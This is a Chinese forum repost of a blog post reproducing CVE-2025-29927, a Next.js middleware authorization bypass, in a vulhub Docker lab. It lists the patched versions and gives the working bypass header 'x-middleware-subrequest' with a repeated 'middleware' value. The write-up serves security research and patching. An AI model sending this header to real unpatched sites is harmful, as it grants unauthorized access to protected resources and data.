卡拉爷 發表於 2025-3-24 12:00:00

CVE-2025-29927 Next.js 中间件权限绕过漏洞复现

<h3 id="免责声明">免责声明</h3>
<p>本文所述漏洞复现方法仅供安全研究及授权测试使用;任何个人/组织须在合法合规前提下实施,严禁用于非法目的。作者不对任何滥用行为及后果负责,如发现新漏洞请及时联系厂商并遵循漏洞披露规则。</p>
<h3 id="漏洞信息">漏洞信息</h3>
<p>Next.js 是一个基于 React 的流行 Web 应用框架,提供服务器端渲染、静态网站生成和集成路由系统等功能。包含众多功能,是深入研究复杂研究的完美游乐场。在信念、好奇心和韧性的推动下,我们出发去探索它鲜为人知的方面,寻找等待被发现的隐藏宝藏。</p>
<p>当使用中间件进行身份验证和授权时,Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。</p>
<p>该漏洞允许攻击者通过操作 <code>x-middleware-subrequest</code> 请求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。</p>
<p>补丁:</p>
<ul>
<li>对于 Next.js 15.x,此问题已在 15.2.3 中修复</li>
<li>对于 Next.js 14.x,此问题已在 14.2.25 中修复</li>
</ul>
<h3 id="漏洞复现">漏洞复现</h3>
<p>vulhub已有环境:vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)</p>
<p>启动环境:</p>
<pre><code>docker compose up -d
</code></pre>
<p><img src="https://img2024.cnblogs.com/blog/2855436/202503/2855436-20250324115925601-936367598.png" alt="" loading="lazy"></p>
<p>访问虚拟机3000端口,可以看到环境搭建成功:http://your-ip:3000/login</p>
<p><img src="https://img2024.cnblogs.com/blog/2855436/202503/2855436-20250324115930128-1046305236.png" alt="" loading="lazy"></p>
<p>访问根路径,显示需要登陆:</p>
<p><img src="https://img2024.cnblogs.com/blog/2855436/202503/2855436-20250324115938816-1109577171.png" alt="" loading="lazy"></p>
<p>添加请求头,使用权限绕过payload</p>
<pre><code>x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
</code></pre>
<p>访问成功,权限绕过漏洞复现成功</p>
<p><img src="https://img2024.cnblogs.com/blog/2855436/202503/2855436-20250324115936641-1030015712.png" alt="" loading="lazy"></p>
<h3 id="参考文章">参考文章</h3>
<p>Next.js 和损坏的中间件:授权工件 - zhero_web_security (zhero-web-sec.github.io)</p>
<p>vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)</p>
<p>CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog (ch35tnut.com)</p>
<p>Next.js中间件授权绕过漏洞终极指南:CVE-2025-29927深度解析与防护策略 - 高效码农 (xugj520.cn)</p>
<p>Comparing v15.2.2...v15.2.3 · vercel/next.js (github.com)</p>
<p>代码审计知识星球 (zsxq.com)</p>
<hr>
<p>本文作者CVE-柠檬i<br>
CSDN:https://blog.csdn.net/weixin_49125123<br>
博客园:https://www.cnblogs.com/CVE-Lemon<br>
微信公众号:Lemon安全</p><br><br>
来源:https://www.cnblogs.com/CVE-Lemon/p/18789173
頁: [1]
查看完整版本: CVE-2025-29927 Next.js 中间件权限绕过漏洞复现